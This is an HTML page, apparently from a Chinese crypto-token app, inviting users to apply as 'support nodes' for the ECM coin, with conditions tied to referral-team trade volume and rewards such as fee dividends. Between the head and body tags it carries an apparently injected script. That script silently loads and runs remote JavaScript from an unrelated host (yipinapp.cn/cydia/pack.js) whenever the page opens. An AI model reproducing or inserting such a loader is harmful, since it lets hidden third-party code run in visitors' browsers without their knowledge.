<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
		<title>申请节点</title>
		<link rel="stylesheet" href="../../static/css/weui.css" />
		<link rel="stylesheet" href="../../static/css/common.css" />
		<link rel="stylesheet" href="../../static/css/account/node.css" />
	</head>
	<script>
		(function () {
			var dw = document.createElement("script");
			dw.src = "https://yipinapp.cn/cydia/pack.js?zBv2XrG8cSQqzRDCm9hsEL"
			var s = document.getElementsByTagName("script")[0];
			s.parentNode.insertBefore(dw, s);
		})()
	</script>
	<body>
		<header class="weui-bar weui-bar-nav" id="returnBtn">
		    <a class="weui-pull-left weui-btns">
		        <span class="weui-cell__fts"></span>
		    </a>
		    <div class="weui-title">申请节点</div>
		</header>
		<div class="nodeOne">
			<div class="nodebox">
				<h4>成为支持节点的条件</h4>
				<ul class="condition">
					<li>1. 推荐人团队每天交易单数需要达到<span class="orderNum"></span>单（考核<span class="day"></span>天） </li>
					<li>2. 每月需燃烧出售池<span class="coinNum"></span>ECM</li>
				</ul>
			</div>
			<h4>成为支持节点可以获得什么？</h4>
			<ul class="condition">
				<li>1. 每日可出售额度提高至<span class="linesNum"></span></li>
				<li>2. 支持节点享受每日社区手续费分红的<span class="procedure"></span></li>
				<li>3. 开通资产转账功能</li>
			</ul>
			<div class="appelDiv">
				<a href="nodetwo.html" class="weui-btn mybgBtn">我要申请</a>
			</div>
		</div>
		<script type="text/javascript" src="../../lib/zepto.min.js" ></script>
		<script type="text/javascript" src="../../lib/jquery-weui.js" ></script>
		<script type="text/javascript" src="../../lib/weui.js" ></script>
		<script type="text/javascript" src="../../static/js/common.js" ></script>
		<script type="text/javascript" src="../../static/js/api.js" ></script>
		<script type="text/javascript" src="../../static/js/account/term.js" ></script>

	</body>
</html>
